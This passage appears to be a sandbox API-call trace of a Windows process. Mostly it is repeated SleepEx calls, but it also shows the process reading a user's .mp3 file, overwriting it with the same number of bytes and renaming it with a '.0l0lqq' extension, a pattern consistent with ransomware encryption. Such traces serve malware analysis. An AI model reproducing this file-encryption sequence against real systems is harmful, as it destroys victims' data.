[0249.140] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.176] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.270] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.332] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.378] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.425] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.722] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.798] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.800] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.847] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.002] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.051] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.108] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.616] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.701] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.749] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.796] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0252.906] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.186] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.193] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.198] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.203] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.203] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.204] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.216] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.219] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.220] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.220] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.221] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.221] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.221] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.222] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.267] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.388] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.952] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.973] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.977] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.979] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.980] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.982] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.987] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.989] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.995] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0253.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.005] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.014] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.026] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.028] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.035] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.123] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.136] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.136] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.137] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.138] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.193] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.193] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.194] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.196] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.228] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0254.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5dcf018) returned 1 [0254.986] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2iawpqcoa3.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5dcf094 | out: lpFileInformation=0x5dcf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ed85b0, ftCreationTime.dwHighDateTime=0x1d5db75, ftLastAccessTime.dwLowDateTime=0xf9182c20, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0xf9182c20, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x94ec)) returned 1 [0254.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5dcf014) returned 1 [0254.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3", nBufferLength=0x105, lpBuffer=0x5dcebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3", lpFilePart=0x0) returned 0x32 [0254.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5dcf078) returned 1 [0254.986] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2iawpqcoa3.mp3"), fInfoLevelId=0x0, lpFileInformation=0x6f8ccc4 | out: lpFileInformation=0x6f8ccc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ed85b0, ftCreationTime.dwHighDateTime=0x1d5db75, ftLastAccessTime.dwLowDateTime=0xf9182c20, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0xf9182c20, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x94ec)) returned 1 [0254.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5dcf074) returned 1 [0254.986] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3", nBufferLength=0x105, lpBuffer=0x5dcebcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3", lpFilePart=0x0) returned 0x32 [0254.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5dcf078) returned 1 [0254.986] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2iawpqcoa3.mp3"), fInfoLevelId=0x0, lpFileInformation=0x6f8cda8 | out: lpFileInformation=0x6f8cda8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ed85b0, ftCreationTime.dwHighDateTime=0x1d5db75, ftLastAccessTime.dwLowDateTime=0xf9182c20, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0xf9182c20, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x94ec)) returned 1 [0254.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5dcf074) returned 1 [0254.988] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3", nBufferLength=0x105, lpBuffer=0x5dcea5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3", lpFilePart=0x0) returned 0x32 [0254.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5dcef50) returned 1 [0254.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2iawpqcoa3.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x588 [0254.988] GetFileType (hFile=0x588) returned 0x1 [0254.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5dcef4c) returned 1 [0254.988] GetFileType (hFile=0x588) returned 0x1 [0254.988] GetFileSize (in: hFile=0x588, lpFileSizeHigh=0x5dcf058 | out: lpFileSizeHigh=0x5dcf058*=0x0) returned 0x94ec [0254.988] ReadFile (in: hFile=0x588, lpBuffer=0x6f933f8, nNumberOfBytesToRead=0x94ec, lpNumberOfBytesRead=0x5dcf004, lpOverlapped=0x0 | out: lpBuffer=0x6f933f8*, lpNumberOfBytesRead=0x5dcf004*=0x94ec, lpOverlapped=0x0) returned 1 [0254.989] CloseHandle (hObject=0x588) returned 1 [0254.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5dcef38) returned 1 [0254.998] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2iawpqcoa3.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x588 [0255.000] GetFileType (hFile=0x588) returned 0x1 [0255.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5dcef34) returned 1 [0255.000] GetFileType (hFile=0x588) returned 0x1 [0255.000] WriteFile (in: hFile=0x588, lpBuffer=0x6fcd06c*, nNumberOfBytesToWrite=0x94ec, lpNumberOfBytesWritten=0x5dceff4, lpOverlapped=0x0 | out: lpBuffer=0x6fcd06c*, lpNumberOfBytesWritten=0x5dceff4*=0x94ec, lpOverlapped=0x0) returned 1 [0255.002] CloseHandle (hObject=0x588) returned 1 [0255.008] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3", nBufferLength=0x105, lpBuffer=0x5dceb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3", lpFilePart=0x0) returned 0x32 [0255.008] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3.0l0lqq", nBufferLength=0x105, lpBuffer=0x5dceb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3.0l0lqq", lpFilePart=0x0) returned 0x39 [0255.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5dcefdc) returned 1 [0255.008] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2iawpqcoa3.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5dcf058 | out: lpFileInformation=0x5dcf058*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ed85b0, ftCreationTime.dwHighDateTime=0x1d5db75, ftLastAccessTime.dwLowDateTime=0xf9182c20, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x68f3d650, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x94ec)) returned 1 [0255.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5dcefd8) returned 1 [0255.009] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2iawpqcoa3.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2iawPQcoA3.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2iawpqcoa3.mp3.0l0lqq")) returned 1 [0255.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.043] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.135] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.229] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.276] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.382] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.386] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.387] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.404] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.406] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.419] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.420] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.422] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.425] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0255.430] SleepEx 